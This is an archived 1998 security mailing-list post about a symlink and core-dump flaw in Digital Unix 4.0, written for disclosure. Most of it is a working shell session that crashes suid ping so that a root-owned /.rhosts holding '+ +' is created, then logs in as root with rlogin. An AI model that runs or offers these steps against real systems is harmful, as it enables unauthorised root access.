The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Symlink problem (Tested only on a Digital Unix 4.0)


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
X-RDate: Tue, 07 Apr 1998 08:31:03 +0600 (ESD)
Date: Sun, 6 Apr 1997 18:32:39 +0200
From: root <[email protected]>
To: [email protected]
Subject: Symlink problem (Tested only on a Digital Unix 4.0)

Symlink problem in Digital Unix 4.0, discovered by |-ru5ty- and [SoReN]
(28/03/1998)

Starting 2 suid root programs in background, and killing them with -11 flag,
we'll have a core root owned with our gid and mode 600. Then is enough a
symlink
to create a file everywhere...like /.rhosts.

[email protected] [email protected]

$ ls -l /.rhosts
/.rhosts not found
$ ls -l /usr/sbin/ping
-rwsr-xr-x   1 root     bin        32768 Nov 16  1996 /usr/sbin/ping
$ ln -s /.rhosts core
$ IMP='
>+ +
>'
$ ping somehost &
[1] 1337
$ ping somehost &
[2] 31337
$ kill -11 31337
$ kill -11 1337
[1]    Segmentation fault   /usr/sbin/ping somehost (core dumped)
[2]    +Segmentation fault   /usr/sbin/ping somehost (core dumped)
$ ls -l /.rhosts
-rw-------   1 root     system    385024 Mar 29 05:17 /.rhosts
 ##/.rhosts has been created....that's all.##
$ rlogin localhost -l root

Is a very serious problem, it needs a fix as soon as possible,
infact we can have a DoS if we link our core to the kernel.


Other platforms:

SunOs    4.1.x 5.5.x    Doesn't work
Linux       2.0.x             Doesn't work
Digital Unix 4.0d         Doesn't work
Others     (note tested yet)

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру